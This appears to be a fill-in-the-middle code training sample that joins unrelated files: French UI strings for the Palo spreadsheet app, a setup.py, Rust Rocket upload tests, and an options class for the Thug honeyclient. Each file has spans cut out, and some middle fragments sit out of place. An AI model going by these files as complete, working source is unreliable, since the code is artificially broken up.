"Référence de cellule", "Text": "Texte", "Web Address": "Adresse Web", "Type the cell reference": "Tapez la référence de la cellule", "_cell_sheet_reference": "Cible (cellule ou feuille)", "_error: empty hl name": "Le nom de lien hypertexte (texte à afficher) est vide. Veuillez ajouter un nom.", "This field is required": "Ce champ est obligatoire", "Select a place in this document": "Veuillez sélectionnez un emplacement dans le document", "Name of new document": "Nom du nouveau document", "When to edit": "Quand modifier", "Link to": "Lien vers", "Address": "Adresse", "Existing File": "Fichier existant", "Place in This Document": "Emplacement dans ce document", "Create New Document": "Créer un document", "Web page": "Page Web", "E-mail Address": "Adresse de messagerie", "No images to display": "Pas d'image à afficher", "Screen tip": "Info bulle", "Insert Hyperlink": "Insérer un lien hypertexte", "Selection": "Sélection", "Named Rang": "Plage nommée", "Variable": "Variable", "Constant Value": "Valeur constante", "Constant List": "Liste constante", "Variable list": "Liste variable", "From Cell": "De la cellule", "Hyperlink Error": "Erreur de lien hypertexte", "_hl_missing_target_node": "Le document lié n\'existe pas. Il a peut être été déplacé ou supprimé. Veuillez en choisir un autre.", "_hl_missing_target_sheet_nr":"La feuille liée ou la plage nommée n\'existe pas. Elle a peut être été renommée ou supprimée. Veuillez en choisir une autre.", "_hl_no_selected_file": "Vous n'avez sélectionné aucun fichier. <br> Veuillez sélectionner un fichier et essayer à nouveau.", "Transfer": "Transfert", "Transfer to": "Transfert à", "Transfer To (Key)": "Transfert à", "Transfer From (Key)": "Transfert de", "Transfer From": "Transfert de", "Named Range": "Plage nommée", "Update": "Actualiser", "Picture Hyperlink": "Lien hypertexte d\'une image", //Insert Picture Dialog "Select a picture": "Sélectionner une image", "Photo": "Photo", "File Name": "Nom du fichier", "Enter the File name": "Indiquer le nom du fichier.", "Enter the File description": "Indiquer la description du fichier", "_lbl: picToImport": "Fichier image pour l'import (uniquement .gif, .jpg, .jpeg et .png possible)", "Edit Picture": "Modifier l'image", "Delete Picture": "Supprimer l'image", "impImg_msgWrongType": "Format d'image non supporté !", "imgDlg_genError": "L\'import de l\'image n\'est pas possible.", "imgDlg_deleteError": "Il n'est pas possible de supprimer l'image sélectionnée !", "Unable to import picture": "L\'import de l\'image n\'est pas possible.", "imgFile_toBig": "L\'image est trop grande. La taille maximale de l\'image est 2MB.", "imgFile_unsupportedType": "Format d'image non supporté !", "imgFile_undefError": "Une erreur inconnue est survenue.", "Reset": "Annuler", //Sheet Move OR Copy dialog "(new book)": "(nouvelle feuille de calcul)", "(move to end)": "(mettre à la fin)", "To Book": "Dans la feuille de calcul", "Before sheet": "Coller avant", "Move or Copy": "Déplacer/Copier", "Create a copy": "Créer une copie", //Rename Sheet Dialog "New Name": "Nouveau nom", "informationMsg": "Le nom existe déjà", "adviceMsg": "Indiquer un nouveau nom", // Status Bar Localization "Designer": "Designer", "User": "Utilisateur", "QuickView": "Aperçu rapide", "Ready": "Prêt", "Mode": "Mode", //Paste Special Dialog "All using Source theme": "Tout ce qu'utilise la plage source", "All except borders": "Tout sauf bordure", "Column widths": "Largeurs des colonnes", "Formulas and number": "Formules et nombre", "Values and number formats": "Valeurs et format de nombres", "Substract": "Soustraire", "Multiply": "Multiplier", "Divide": "Diviser", "Skip blanks": "Sauter les blancs", "Transpose": "Transposer", "Paste Link": "Insérer lien", "Formulas and number formats": "Formules et formats de nombres", "Myltiply": "Multiplier", "Transponse": "Transposer", "All": "Tous", "Content Types": "Types de contenu", "Values": "Valeurs", "Styles": "Styles", "Formats": "Formats", "Conditional Formats": "Format conditionnel", "Cell Metadata": "Métadonnée de cellule", "Cancel": "Annuler", "OK": "OK ", //Name Manager Dialog "Value": "Valeur", "Refers To": "Fait référence à", "Scope": "Portée", "Name Manager": "Gérer les noms", "Edit Name": "Modifier le nom", "Save Range": "Enregistrer la plage", "Names Scoped to Worksheet": "Noms limités à cette feuille", "Names Scoped to Workbook": "Noms limités à ce classeur", "Names With Errors": "Noms avec erreurs", "Names Without Errors": "Noms sans erreur", "Named formula couldn't be created": "La formule nommée n\'a pas pu être créée", // Hyperlink "follHLInvalidRef": "Référence non valide", "follHLTmpDisabledRef": "Référence temporairement désactivée", "follHLInvalidRng": "Il n'est pas possible d'accéder à l'adresse du lien hypertexte.", "follHLInvalidSheet": "La feuille de calcul n\'existe pas.", "follHLNamedRngUnsupport": "Le lien hypertexte contient un lien vers une plage de cellules avec noms - actuellement non supporté.", "follHLInvalidFormat": "Le format du lien hypertexte est invalide.", "follHLInvalidWB": "Il n'est pas possible de trouver et d'ouvrir le classeur indiqué par le lien hypertexte.", "follHLInvalidDoc": "Il n'est pas possible de trouver et d'ouvrir le document indiqué par le lien hypertexte.", "follHLInvalidURL": "L\'URL du lien hypertexte est invalide.", "follHLTmpDisabledWB": "Les liens vers d\'autres classeurs ne fonctionnent pas dans ce mode d\'application.", "follHLTmpDisabledWS": "Les liens vers d\'autres feuilles ne fonctionnent pas dans ce mode d\'application.", "follHLInvTrgNRange": "Le plage cible nommé n\'existe pas.", "follHLNotSuppInStandalone": "La cible du lien hypertexte n\'est pas supporté en mode standalone. Il ne peut être utilisés que dans Palo Studio.", "HLCntxNewWin": "Ouvrir le lien dans une nouvelle fenêtre.", "HLCntxNewTab": "Ouvrir le lien dans un nouvel onglet.", "HLCntxRemove": "Supprimer le lien hypertexte", "HLInvalidRefNotice": "Veuillez modifier pour le faire fonctionner correctement.", //New Name Dialog "Workbook": "Classeur", "newNameDlg_WarningMsg": "Vous n'avez pas correctement indiqué les paramètres. <br>Veuillez corriger les paramètres et essayer à nouveau.", "newNameDlg_NameWarningMsg": "Le nom indiqué n\'est pas valide.<br><br>La raison peut être :<br>   - Le nom commence par une lettre ou un souligné<br>   - Le nom contient un espace ou un autre signe non valide<br>   - Le nom est en conflit avec le nom d\'un élément de la solution ou avec un autre nom d\'objet dans le classeur", //Page Setup Dialog "Header": "En-tête", "Footer": "Pied de p.", "Horizontally": "Horizontalement", "Vertically": "Verticalement", "Orientation": "Centrer sur la page", "Custom Header": "En-tête personnalisé", "Custom Footer": "Pied de page personnalisé", "Print area": "Zone d'impression", "Gridlines": "Quadrillage", "Cell Errors As": "Cellules avec erreurs", "Down, then over": "Première vers le bas", "Over, then down": "Première à droite", "Page order": "Ordre des pages", "Adjust to": "Taille ", "Fit to": "Ajuster", "Page": "Page", "Margins": "Marges", "Header/Footer": "En-tête/Pied de page", "(none)": "(Aucun)", "Book": "Classeur", "of": "de", "Format text": "Format texte", "Portrait": "Portrait", "Landscape": "Paysage", "Paper size": "Format du papier", "Letter": "Format lettre", "Print quality": "Qualité d'impression", "First page": "Commencer la numérotation à", //Custom Header Footer "customHFLbl": "Pour formater le texte, sélectionnez le texte et cliquez ensuite sur le bouton Formet texte. <br>"+ "Pour insérer des numéros de page, la date, l'heure, des noms de fichier, des noms de feuille de calcul ou un chemin d'accès, positionnez le curseur dans la barre de traitement et cliquez sur le bouton souhaité.<br>"+ "Pour insérer une image, cliquez sur le bouton Insérer une image. <br><br>", "Insert Page Number": "Insérer le numéro de page", "Insert Number of Pages": "Insérer le nombre de pages", "Insert Date": "Insérer la date", "Insert Time": "Insérer l'heure", "Insert File Name": "Insérer le nom du fichier", "Insert Sheet Name": "Insérer le nom de la feuille de calcul", "Insert Picture": "Insérer une image", "Left section": "Section à gauche", "Center section": "Section au milieu", "Right section": "Section à droite", // Suspend Mode "suspModeMsg": "Le mode de designer est bloqué parce que le mode d\'utilisateur est ouvert dans une fenêtre.<br><br>Pour continuer, veuillez fermez cette fenêtre.", "Suspend Mode": "Mode en pause", // Form ComboBox Dialog "Format ComboBox": "Formater la ComboBox", "List Type": "Type de liste", "Palo Subset": "Sous-ensemble Palo", "Cell": "Cellule", "Select Wizard type": "Choisissez le type d'assistant", "WSS_FormComboBox_empty_source": "La source n\'est pas indiquée.", "WSS_FormComboBox_empty_target": "La destination n\'est pas indiquée.", "formel_inv_add": "Il n'est pas possible d'insérer l'élement formulaire.", "formel_exists": "L\'élément \"{nom}\" existe déjà.", "formel_nrange_exists": "Le nom de la plage cible \"{Nom}\" existe déjà.", "formel_no_nrange": "Le nom de la plage cible \"{Name}\" n\'existe pas.", "formel_inv_target": "La cellule cible ou la plage cible non valide.", "formel_inv_target_sheet": "La feuille cible \"{name}\" n\'existe pas.", "formel_add_wsel_err": "L\'insertion de l\'élément formulaire à la mémoire WSEl a échoué", "formel_proc_err": "Erreur de l'élément formulaire", "formel_edit": "Modifier {type}", "formel_delete": "Supprimer {type}", "formel_assign_macro_err": "Impossible d'assigner une macro.", "formel_no_el": "L\'élément cible n\'a pas été trouvé.", "ComboBox Name": "Nom de la ComboBox", "Subset": "Sous-ensemble", "checkbox_inv_state": "La Check Box a un statut invalide.", "CheckBox Name": "Nom de la Check Box", "Unchecked": "Non coché", "Checked": "Coché", "Mixed": "Mélangé", "Format Control": "Contrôle format", "Checkbox Label": "Libellé de la Check Box", "Button Label": "Libellé du bouton", "Button Name": "Nom du bouton", "Assign Macro": "Assigner une macro", "Application Error": "Erreur d'application", "noWBtoSwitch": "Il n'est pas possible de basculer vers la feuille sélectionnée.", "noWBtoClose": "Il n'est pas possible de de fermer le classeur sélectionné.", // Load Workbook messages "errLoadWB_intro": "Il n'est pas possible d'ouvrir le classeur.", "errLoadWB_noNode": "La connexion n\'a pas été trouvée.", "errLoadWB_noFile": "Le fichier n\'existe pas.", "errLoadWB_selErr": "Il n'est pas possible de sélectionner un classeur déjà ouvert.", "errLoadWB_coreErr": "Le système ne peut pas ouvrir le classeur sélectionné", "errLoadWB_noRights": "Droits d'accès insuffisants.", "errLoadWB_cyclicDep": "Cyclic dépendance existe entre le classeur sélectionné et ses ressources.", // PALO Import Wizard "PALO Import Wizard": "Assistant d'import Palo", "impPalo_msgWrongType": "Le chemin d\'accès complet vers le fichier TXT ou CSV doit être présent dans ce champ !", "impPalo_msgFieldBlank": "Veuillez choisir un fichier !", "Next": "Suivant", "Decimalpoint": "Point décimal", "_msg: Palo Import 1": "Cet assistant va vous permettre de parcourir les enregistrements dans la première ligne de la feuille active.", "_msg: Palo Import 21": "A cette étape, vous allez indiquer le fichier texte à importer.", "_msg: Palo Import 3": "Cliquez sur suivant pour voir l'enregistrement suivant ou terminer pour parcourir tous les enregistrements.", "Select the sourcefile (*.txt, *.csv)": "Choisissez le fichier source (*.txt, *.csv).", "Flat Textfile (*.txt, *.csv)": "Fichier texte (*.txt, *.csv)", "ODBC Query": "Requête ODBC", "Internal Loop (increse A1 until error in B1)": "Boucle interne (augmente A1 jusqu'à provoquer une erreur en B1)", "Tab": "Tabulation", "Comma": "Virgule", "Semicolon": "Point virgule", "Blank": "Blanc", "User-defined": "Défini par l'utilisateur", "Header exists": "En-têtes existants", "Step by Step": "Pas à pas", "_msg: PaloImport Wait": "Veuillez patienter, les données sont importées dans la feuille !", "Importing": "L\'import est en cours", "Finish": "Terminé", "_msg: PaloImport Upload": "Les données PALO ont été importées", "Uploading": "Chargement", // Function arguments dialog: funcArgs.js "_error: fnc_desc": "Erreur lors du chargement de la description de la fonction", "fnc_no_params": "La fonction n\'a pas de paramètres", "Function Arguments": "Arguments de la fonction", //Edit Macro "New Module": "Nouveau module", "Add New Module": "Ajouter un nouveau module", "Find": "Rechercher", "Modules Repository": "Référentiel de Modules", "Error Renaming Module": "Erreur en renommant le module", "rename_module_error_msg": "Erreur_renommant_le_module", "Macro Editor": "Editeur de Macro", "Rename Module": "Renommer le module", "Delete Module": "Supprimer le module", "Module": "Module", "edit_macro_no_module_selected_err": "edition_macro_erreur_aucun_module_sélectionné", "Error": "Erreur", //autoRefresh.js "Refresh every": "Actualiser toutes les", "seconds": "secondes", "Auto Refresh": "Actualisation automatique", // Autosave "File not saved": "Le fichier n\'est pas été enregistré", "autosave_msg": "Voulez-vous enregistrer vos modifications?", "Open and Repair": "Ouvrir et réparer", "Size": "Taille ", "date_format": "d/m/Y H:i:s", "astype_orig": "Ouvrir le fichier original (Date: {date} / Taille: {size})", "astype_recov": "Ouvrir le fichier de récupération de la liste:", "as_msg": "Le classeur n\'a pas été fermé correctement. Comment voulez-vous procéder?", // Quick Publish "_QP_unsaved_warning": "Le document non enregistré ne peut pas être publié. Souhaitez-vous enregistrer le document maintenant?", "_QP_error": "La publication n\'a pas fonctionné. Veuillez essayer de nouveau", "Report name": "Nom du rapport", "_QP_double_warning": "Un rapport nommé <b>{rName}</b> existe déjà dans le dossier sélectionné. Veuillez le renommer ou utiliser le nom suggéré.", "_QP_noSelection": "Veuillez sélectionnez le dossier où le classeur devrait être publié.", "Group": "Groupe", "Hierarchy": "Hiérarchie", "Publish": "Publication", "_QP_directions": "Choisissez le dossier où vous souhaitez publier le classeur.", "_QP_success": "Le classeur a été publié avec succès!", "Report must have name": "Le rapport doit porter un nom", //ribbon.js "Home":"Accueil", "View": "Affichage", "New<br>document":"Nouveau<br>document", "Create new document":"Créer un nouveau document", "Open":"Ouvrir", "Recent":"Dernières", "Open document":"Ouvrir un document", "Save":"Enregistrer", "Save document":"Enregistrer le document", "Export":"Export ", "XLSX":"XLSX ", "PDF":"PDF ", "HTML":"HTML ", "Save As":"Enregistrer sous", "Save As document":"Enregistrer comme un document", "Close":"Fermer", "Operation":"Opération", "Undo":"Annuler", "Redo":"Rétablir", "Clipboard":"Presse-papiers", "Paste":"Coller", "Paste Special":"Collage spécial", "Cut":"Couper", "Copy":"Copier", "Format Painter":"Reproduire la mise en forme", "Bold":"Gras", "Italic":"Italique", "Bottom Border":"Bordure inférieure", "Top Border": "Bordure supérieure", "Left Border": "Bordure gauche", "Right Border": "Bordure droite", "All Borders": "Toutes les bordures", "Outside Borders": "Bordures extérieures", "Thick Outside Border": "Bordure extérieure épaisse", "No Border": "Aucune bordure", "Top and Bottom Border": "Bordure en haut et en bas", "Thick Bottom Border": "Bordure épaisse en bas", "Top and Thick Bottom Border": "Bordure simple en haut et épaisse en bas", "More Borders": "Plus de bordure", "Fill Color": "Couleur de remplissage", "Font Color":"Couleur de police", "Alignment":"Alignement", "Left":"À gauche", "Align Text Left":"Aligner le texte à gauche", "Center":"Au centre", "Align Text Center":"Aligner le texte au centre", "Right":"À droite", "Merge Cells":"Fusionner les cellules", "Unmerge Cells":"Annuler la fusion des cellules", "Cells":"Cellules", "Insert Rows":"Insérer des lignes", "Insert Columns":"Insérer des colonnes", "Insert Sheet":"Insérer une feuille", "Delete":"Supprimer", "Delete Sheet":"Supprimer la feuille", "Format":"Format ", "AutoFit Row Height":"Ajustement automatique des lignes", "Column Width":"Largeur de colonne", "AutoFit Column Width":"Ajustement automatique des colonnes", "Rename Sheet":"Renommer la feuille", "Move or Copy Sheet":"Déplacer où copier la feuille", "Lock<br>Unlock":"Verouillée<br>déverrouillée", "Conditional<br>Formating":"Mise en forme<br>conditionnelle", "New Rule":"Nouvelle règle", "Clear Rules":"Supprimer des règles", "Clear Rules from Selected Cells":"Supprimer les règles des cellules sélectionnées", "Clear Rules from Entire Sheet":"Supprimer les règles de la feuille entière", "Manage Rules":"Gérer les règles", "Editing":"Modifier", "Clear All":"Effacer tout", "Clear Formats":"Effacer le format", "Clear Contents":"Effacer le contenu", "Quick View":"Aperçu rapide", "Designer Preview": "Aperçu Designer", "User Mode":"Mode d\'utilisateur", "Open User Mode":"Ouvrir le mode d'utilisateur", "Insert":"Insertion", "Ilustrations":"Illustrations", "Picture":"Image", "Links":"Liens", "Hyperlink":"Hyperlien", "Charts":"Graphiques", "Chart":"Graphique", "Micro Chart":"Micrographique", "Page Layout":"Mise en page", "Themes":"Thèmes", "Theme":"Thème", "Blue (default)":"Bleu (défaut)", "Gray":"Gris", "Dark":"Sombre", "Page Setup":"Mise en page", "Print<br>Preview":"Aperçu<br>avant impression", "Formulas":"Formules", "Function":"Fonction", "Insert<br>Funciton":"Insérer<br>fonction", "Defined Names":"Noms définis", "Name<br> Manager":"Gestion<br>des noms", "Define Name":"Définir un nom", "Calculation":"Calcul", "Refresh<br>Data":"Actualiser les données", "Auto - Refresh Data":"Actualiser les données automatiquement", "Show/Hide":"Afficher/Masquer", "Toolbars":"Barres d'outils", "Formula Bar":"Barre de formule", "Status Bar":"Barre d'état", "Window":"Fenêtre", "Arrange <br>All":"Réorganiser<br>tous", "Hide":"Masquer", "Unhide":"Démasquer", "Developer":"Développeurs", "Controls":"Contrôles", "Macro <br>Editor":"Editeur <br>Macro", "Combo Box":"Liste Déroulante", "Check Box":"Case à cocher", "Button":"Bouton", "Dyna Ranges":"Dyna_Ranges", "Horizontal <br> Dyna Range":"Dyna Range <br> Horizontal", "Vertical <br> Dyna Range":"Dyna Range <br> Vertical", "Create or Modify Reports":"Créer ou modifier les rapports", "Paste <br>View":"Créer<br>une vue", "Paste Elements":"Coller des éléments", "Paste Subset":"Coller un sous-ensemble", "Paste Function":"Fonction d'accès aux données", "Control and Modify Palo":"Contrôler et modifier Palo", "Modeller":"Outil de modélisation", "Import Data":"Import de données", "Save as Snapshot":"Sauvegarder comme instantané", "Info":"Info", "Wiki Palo":"Wiki Palo", "About Palo":"À propos de Palo", "Open documents": "Ouvrir des documents", "Help": "Aide", "_bold": "_gras", "_italic": "_italique", "Data labels orientation": "Orientation des étiquettes de données", "Rotate all text 90": "Rotation 90 du texte", "Rotate all text 270": "Rotation 270 du texte", "Custom angle": "Angle spécifique", "Palo_get_paste_view_init": "La vue collée n\'a pas été correctement stockée. Essayez de la recréer.", "Vertical Dynarange": "Vertical_DynaRange", "Horizontal Dynarange": "Horizontal_DynaRange", "CheckBox": "Case à cocher", "Variables": "Variables", "Private": "Privé", "Current Value": "Valeur Courante", "Used Variables": "Variables utilisées", "invalidContext": "L\'application a essayé d\'utiliser un contexte inexistant.", "Bring Forward": "Déplacer d\'un niveau vers l\'avant", "Bring to Front": "Déplacer vers l\'avant", "Please select rule to edit": "Veuillez sélectionner la règle à modifier.", "Send Backward": "Déplacer d\'un niveau vers l\'arrière", "Send to Back": "Déplacer vers l\'arrière", "save_as_override_msg": "Le fichier <b>{fileName}</b> existe déjà. Voulez-vous remplacer le fichier existant?", "execHLInvRange": "La cellule ou la plage du lien hypertexte n\'est pas valide.", "#N/A": "#N/A", "Bold Italic": "Gras Italique", "Cell/Range": "Cellule//Gamme", "Control": "Contrôle", "First": "Première", "Inside": "A l'intérieur", "Last": "Dernier", "Lose": "Perte", "Micro Chart Type": "Type", "Neg. Values": "Valeurs nég", "None": "Aucun", "Open Recent": "Classeurs dernières", "Outline": "A l'extérieur", "Pos. Values": "Valeurs pos.", "Reference": "Référence", "Regular": "Régulier", "Tie": "Équilibre", "Win": "Profit", "blank": "Laisser vide", "displayed": "Imprimer", "normal size": "de la taille normale", "page(s) wide by": "page(s) en largeur sur", "tall": "en hauteur", "wsel_inv_target": "La cellule cible ou la plage cible n\'est pas valide.", "wsel_inv_target_sheet": "La feuille cible \"{name}\" n\'existe pas.", "wsel_nrange_exists": "Le zone cible indiquée \"{name}\" existe déjà.", "Widgets": "Widgets", "Custom Widget": "Widget personnalisé", "widget_exists": "Widget \"{name}\" existe déjà.", "widget_add_wsel_err": "Adjonction de Widget au stockage WSEl était echoué.", "widget_edit": "Éditer Widget", "widget_delete": "Supprimer Widget", "WSS_Forms_empty_name": "Le nom n\'est pas précisé", "WSS_Widget_empty_content": "Le contenu des Widgets n\'est pas spécifié. S\'il vous plaît entrez le code HTML ou l\'URL.", "New name": "Nouveau nom", "inset_name_err_msg": "La formule nommée n'a pas pu être créé.", "currCoord_validate_err_msg": "Vous devez entrer une référence valide où vous voulez aller, ou tapez un nom valide pour la sélection.", "Show borders in User mode": "Afficher les bordures en mode utilisateur.", "new_folder_name_warrning": "Le nom de dossier <b> {new_name} </b> existe déjà. Type un autre nom pour le dossier.", "imp_success_msg": "Le fichier a été importé avec succès.", "Import log": "Journal d\'importation", "floatingElement_wrongSizePos": "La taille ou la position de l\'élément n\'est pas valide. Veuillez vérifier les valeurs de la taille et de la position dans le cadre.", "invalid_chart_sizepos": "La taille ou la position du graphique n\'est pas valide. Veuillez entrer des valeurs valides.", "invalid_picture_size": "La taille ou la position de l\'image n\'est pas valide. Veuillez entrer des valeurs valides.", "fopperLic": "Le licence pour imprimer PDF.", "License could not be checked": "La licence n\'a pas pu être vérifiée.", "License could not be found.": "La licence n\'a pas pu être trouvée.", "License could not be read.": "La licence n\'a pas pu être lu.", "License is not valid.": "La licence n\'est pas valide.", "no_perm_err_msg": "Vous n\'avez pas la permission pour cette opération.", "Zero suppression": "Omission du zéro", "Lock": "Verouiller", "Unlock": "Déverrouiller", "Vertical DynaRange": "Vertical DynaRange", "Horizontal DynaRange": "Horizontal DynaRange", "_error: empty targ name": "La cible du lien hypertexte est vide. Veuillez sélectionner ou entrer cible valide.", "Select target or <br />input frame name": "Options des trames", "Format Widget": "Format Widget", "Widget Name": "Nom de Widget", "macro_preselection_err_msg": "La macro affectée n\'est pas trouvé.<br>La macro affectée est renommé ou supprimé.<br>Veuillez réaffecter la macro à nouveau!", "Content": "Contenu", "errLoadFS_intro": "Impossible de charger le frameset.", "errLoadFS_noNode": "Impossible de trouver le frameset.", "Format painter": "Reproduire la mise en forme", "no_uxpc_err_msg": "Impossible d\'obtenir le privilège du système local.", "no_file_err_msg": "Impossible d\'accéder à le fichier local.", "Size & Position": "Taille et position", "Height": "Hauteur", "errFrameSave_noAccess": "Impossible d\'enregistrer le classeur \"{name}\" dans le frame \"{frame}\" en raison de\ndroits d\'accès insuffisants.", "macro_selection_wrg_msg": "Impossible d\'attribuer macro. Votre sélection est vide.<br>Veuillez sélectionner un macro dans la liste, et essayez à nouveau.", "Show legend": "Afficher la légende", "Bottom": "Dessous", "Top Right": "En haut à droite", "Show the legend without overlapping the chart": "Afficher la légende sans chevauchement du graphique", "Minimum value is 10": "La valeur minimale est 10", "Not correct format": "Le format n\'est pas correct", "min 10": "min 10", "Target_formElems": "Cible", "Convert": "Convertir", "Show log": "Afficher le journal.", "All Workbook Files": "Tous les classeur.", "fnArg_multiple": "multiples", "fnArg_number": "nombre", "fnArg_sequence": "séquence", "fnArg_any": "tout", "fnArg_logical": "logique", "fnArg_reference": "référence", "fnArg_text": "texte" };<|fim▁end|>
"No Color": "Pas de couleur", "More Colors": "Plus de couleurs",
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup setup( name='nspawn-api', packages=['nspawn'], include_package_data=True, install_requires=[ 'gunicorn',<|fim▁hole|> 'nsenter', 'flask', 'pydbus', 'supervisor' ], )<|fim▁end|>
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>use rocket::local::Client; use rocket::http::{Status, ContentType}; <|fim▁hole|>use std::io::Read; use std::fs::{self, File}; const UPLOAD_CONTENTS: &str = "Hey! I'm going to be uploaded. :D Yay!"; #[test] fn test_index() { let client = Client::new(super::rocket()).unwrap(); let mut res = client.get("/").dispatch(); assert_eq!(res.body_string(), Some(super::index().to_string())); } #[test] fn test_raw_upload() { // Delete the upload file before we begin. let _ = fs::remove_file("/tmp/upload.txt"); // Do the upload. Make sure we get the expected results. let client = Client::new(super::rocket()).unwrap(); let mut res = client.post("/upload") .header(ContentType::Plain) .body(UPLOAD_CONTENTS) .dispatch(); assert_eq!(res.status(), Status::Ok); assert_eq!(res.body_string(), Some(UPLOAD_CONTENTS.len().to_string())); // Ensure we find the body in the /tmp/upload.txt file. let mut file_contents = String::new(); let mut file = File::open("/tmp/upload.txt").expect("open upload.txt file"); file.read_to_string(&mut file_contents).expect("read upload.txt"); assert_eq!(&file_contents, UPLOAD_CONTENTS); }<|fim▁end|>
<|file_name|>ThugOpts.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # # ThugOpts.py # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, # MA 02111-1307 USA import sys import logging import six.moves.urllib.parse as urlparse from thug.DOM.Personality import Personality log = logging.getLogger("Thug") class ThugOpts(dict): proxy_schemes = ('http', 'socks4', 'socks5', ) def __init__(self): self._verbose = False self._debug = False self._proxy = None self._raise_for_proxy = True self.local = False self.extensive = False self._threshold = 0<|fim▁hole|> self._connect_timeout = 10 self._timeout = 600 self.ast_debug = False self.http_debug = 0 self._useragent = 'winxpie60' self._referer = 'about:blank' self._events = list() self._delay = 0 self._attachment = False self._file_logging = False self._json_logging = False self._maec11_logging = False self._es_logging = False self._code_logging = True self._cert_logging = True self._no_fetch = False self._broken_url = False self._vt_query = False self._vt_submit = False self._vt_runtime_apikey = None self._mongodb_address = None self._web_tracking = False self._honeyagent = True self.Personality = Personality() def set_verbose(self, verbose): self._verbose = verbose def get_verbose(self): return self._verbose verbose = property(get_verbose, set_verbose) def set_debug(self, debug): self._debug = debug def get_debug(self): return self._debug debug = property(get_debug, set_debug) def set_proxy(self, proxy): if not proxy: self._proxy = None return p = urlparse.urlparse(proxy) if p.scheme.lower() not in self.proxy_schemes: log.warning('[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5)') sys.exit(0) self._proxy = proxy def get_proxy(self): return self._proxy proxy = property(get_proxy, set_proxy) def set_raise_for_proxy(self, raise_for_proxy): self._raise_for_proxy = raise_for_proxy def get_raise_for_proxy(self): return self._raise_for_proxy raise_for_proxy = property(get_raise_for_proxy, set_raise_for_proxy) def get_useragent(self): return self._useragent def set_useragent(self, useragent): if useragent not in self.Personality: log.warning('[WARNING] Invalid User Agent provided (using default "%s")', self._useragent) return self._useragent = useragent useragent = property(get_useragent, set_useragent) def get_referer(self): return self._referer def set_referer(self, referer): self._referer = referer referer = property(get_referer, set_referer) def get_events(self): return self._events def set_events(self, events): if not events: self._events = list() return for e in events.split(","): evt = e.lower().strip() if evt not in self._events: self._events.append(evt) events = property(get_events, set_events) def get_delay(self): return self._delay def set_delay(self, timeout): try: _timeout = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid delay value (should be an integer)') return self._delay = abs(_timeout) delay = property(get_delay, set_delay) def get_attachment(self): return self._attachment def set_attachment(self, attachment): self._attachment = attachment attachment = property(get_attachment, set_attachment) def get_file_logging(self): return self._file_logging def set_file_logging(self, file_logging): self._file_logging = file_logging file_logging = property(get_file_logging, set_file_logging) def get_json_logging(self): return self._json_logging def set_json_logging(self, json_logging): self._json_logging = json_logging json_logging = property(get_json_logging, set_json_logging) def get_maec11_logging(self): return self._maec11_logging def set_maec11_logging(self, maec11_logging): self._maec11_logging = maec11_logging maec11_logging = property(get_maec11_logging, set_maec11_logging) def get_es_logging(self): return self._es_logging def set_es_logging(self, es_logging): self._es_logging = es_logging elasticsearch_logging = property(get_es_logging, set_es_logging) def get_code_logging(self): return self._code_logging def set_code_logging(self, code_logging): self._code_logging = code_logging code_logging = property(get_code_logging, set_code_logging) def get_cert_logging(self): return self._cert_logging def set_cert_logging(self, cert_logging): self._cert_logging = cert_logging cert_logging = property(get_cert_logging, set_cert_logging) def get_no_fetch(self): return self._no_fetch def set_no_fetch(self, fetch): self._no_fetch = fetch no_fetch = property(get_no_fetch, set_no_fetch) def get_threshold(self): return self._threshold def set_threshold(self, threshold): try: value = int(threshold) except ValueError: log.warning('[WARNING] Ignoring invalid threshold value (should be an integer)') return self._threshold = value threshold = property(get_threshold, set_threshold) def get_connect_timeout(self): return self._connect_timeout def set_connect_timeout(self, timeout): try: seconds = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid connect timeout value (should be an integer)') return self._connect_timeout = seconds connect_timeout = property(get_connect_timeout, set_connect_timeout) def get_timeout(self): return self._timeout def set_timeout(self, timeout): try: seconds = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid timeout value (should be an integer)') return self._timeout = seconds timeout = property(get_timeout, set_timeout) def get_broken_url(self): return self._broken_url def set_broken_url(self, mode): self._broken_url = mode broken_url = property(get_broken_url, set_broken_url) def get_vt_query(self): return self._vt_query def set_vt_query(self): self._vt_query = True vt_query = property(get_vt_query, set_vt_query) def get_vt_submit(self): return self._vt_submit def set_vt_submit(self): self._vt_submit = True vt_submit = property(get_vt_submit, set_vt_submit) def get_vt_runtime_apikey(self): return self._vt_runtime_apikey def set_vt_runtime_apikey(self, vt_apikey): self._vt_runtime_apikey = vt_apikey vt_runtime_apikey = property(get_vt_runtime_apikey, set_vt_runtime_apikey) def get_web_tracking(self): return self._web_tracking def set_web_tracking(self, enabled): self._web_tracking = enabled web_tracking = property(get_web_tracking, set_web_tracking) def get_honeyagent(self): return self._honeyagent def set_honeyagent(self, enabled): self._honeyagent = enabled honeyagent = property(get_honeyagent, set_honeyagent) def get_mongodb_address(self): return self._mongodb_address def set_mongodb_address(self, mongodb_address): self._mongodb_address = mongodb_address mongodb_address = property(get_mongodb_address, set_mongodb_address)<|fim▁end|>
